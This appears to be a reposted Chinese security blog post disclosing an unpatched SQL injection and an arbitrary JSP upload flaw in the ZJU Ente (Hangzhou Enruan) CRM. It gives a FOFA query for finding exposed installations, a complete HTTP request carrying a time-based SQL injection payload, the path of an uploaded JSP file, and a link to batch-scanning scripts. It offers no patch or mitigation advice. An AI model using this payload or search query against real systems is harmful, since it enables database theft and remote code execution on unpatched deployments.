浙大恩特CRM最新0day 任意文件上传漏洞与SQL 注入漏洞
2023-11-18 21:36:30 Author: 网络安全透视镜(查看原文) 阅读量:39 收藏

杭州恩软信息技术有限公司(浙大恩特)提供外贸管理软件、外贸客户管理软件等外贸软件,是一家专注于外贸客户资源管理及订单管理产品及服务的综合性公司。

浙大恩特客户资源管理系统中的T0140_editAction.entweb接口存在SQL注入漏洞,攻击者可通过此漏洞获取企业数据库内数据,威胁其他数据安全。

MailAction 接口存在任意文件上传,允许攻击者向系统上传任意恶意JSP文件,从而可能导致潜在的远程执行代码攻击。该漏洞可能会对系统的完整性和安全性产生严重影响。

fofa查询:

title="欢迎使用浙大恩特客户资源管理系统"

SQL注入漏洞POC

GET /entsoft/T0140_editAction.entweb;.js?method=getdocumentnumFlag&documentnum=1';waitfor+delay+'0:0:5'-- HTTP/1.1Host: ip:portAccept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Connection: closeCache-Control: max-age=0

MailAction 任意文件上传漏洞

然后访问路径:http://ip:port/enterdoc/EnterMail/20231118/2023111819455396702806276/check.jsp

pocsuite漏洞检测

批量漏洞检测脚本已上传至github,希望大家下载时候点个star 支持一下

漏洞已上传免费漏洞库地址:

https://github.com/Vme18000yuan/FreePOC



文章来源: http://mp.weixin.qq.com/s?__biz=MzIxMTg1ODAwNw==&mid=2247498352&idx=1&sn=e9f400047f382fce7e9637e32dd5a3a2&chksm=974c5d48a03bd45e40964482d89a89daa826344d0aea2139232d5a0cd3cb96e06e202eda26d8&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh